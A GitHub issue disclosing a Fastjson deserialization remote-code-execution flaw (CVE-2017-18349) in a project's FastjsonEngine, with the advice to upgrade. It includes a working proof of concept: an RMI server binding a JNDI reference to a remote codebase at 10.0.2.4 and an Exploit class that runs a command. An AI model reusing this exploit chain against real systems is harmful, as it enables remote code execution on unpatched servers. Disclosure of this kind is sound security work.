Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

lead to RCE when parse JSON string with Fastjson #466

Closed
idealzh opened this issue Oct 15, 2018 · 2 comments

Comments

Projects
None yet
3 participants
@idealzh
Copy link

commented Oct 15, 2018

The component FastjsonEngine converts a JSON string to an equivalent Java Object based on Fastjson(version 1.2.8);
However,Fastjson version 1.2.24 and prior has a remote code execution vulnerability.
for details,please refer to the links below:
https://fortiguard.com/encyclopedia/ips/44059
http://xxlegend.com/2017/12/06/基于JdbcRowSetImpl的Fastjson%20RCE%20PoC构造与分析/
Upgrade to Fastjson version 1.2.45 or later can fix the issue.

Using the following code snippet to convert a JSON string:

POST("/json",routeContext ->{ String data=routeContext.getRequest().getBody(); FastjsonEngine engine=new FastjsonEngine(); engine.fromString(data, String.class); });

To exploit the vulnerability successfully,we need the following steps:
step1:start a rmi service;
public class Test { /** * @param args * @throws RemoteException */ public static void main(String[] args) throws RemoteException { // TODO Auto-generated method stub Registry registry=LocateRegistry.createRegistry(1099); Reference reference=new Reference("Exploit","Exploit","http://10.0.2.4/"); ReferenceWrapper referenceWrapper = null; try { referenceWrapper = new ReferenceWrapper(reference); } catch (NamingException e1) { // TODO Auto-generated catch block e1.printStackTrace(); } try { registry.bind("Exploit",referenceWrapper); } catch (AlreadyBoundException e) { // TODO Auto-generated catch block e.printStackTrace(); } System.out.println("rmi server started......"); } }

step2:put the Exploit.class under a web service directory which pointed by the rmi service above;
public class Exploit{ public Exploit(){ try{ Runtime.getRuntime().exec("calc"); } catch(Exception e){ e.printStackTrace(); } } }

step3:send a post request contains the malicious JSON string;
demonstration

@rygel

This comment has been minimized.

Copy link
Member

commented Oct 25, 2018

@idealzh Thank you for reporting this issue and your suggestion of how to fix it!

@abergmann

This comment has been minimized.

Copy link

commented Oct 25, 2018

CVE-2017-18349 was assigned to this issue.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.